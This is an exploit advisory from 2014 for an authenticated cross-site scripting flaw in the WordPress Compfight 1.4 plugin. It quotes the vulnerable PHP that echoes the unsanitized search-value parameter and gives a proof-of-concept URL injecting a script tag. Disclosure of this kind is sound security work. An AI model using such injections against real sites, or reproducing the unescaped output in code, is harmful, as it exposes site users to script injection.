######################
# Exploit Title : Wordpress Compfight 1.4 Authenticated Cross Site Scripting

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://wordpress.org/plugins/easy-banners/

# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip

# Date : 2014-07-03

# Tested on : Windows 7 / Mozilla Firefox

######################

# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

  if (!$search_value) {
      $input_text = 'Enter Keyword(s)';
    } else {
      $input_text = $search_value;
    }

    if ($show_title) {
      $output .= '<h3 class="cf_search_title">Compfight</h3>';
      $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
    }

    $output .= '<form method="GET" action="" id="cf-form">';
    $output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
    $output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
    $output .= '</form>';

$input_text variable not sanitized

######################

Exploit Code:

http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search


#####################

Discovered By : Claudio Viviani
		http://www.homelab.it
		info@homelab.it

		https://www.facebook.com/homelabit
		https://twitter.com/homelabit
		https://plus.google.com/+HomelabIt1/

#####################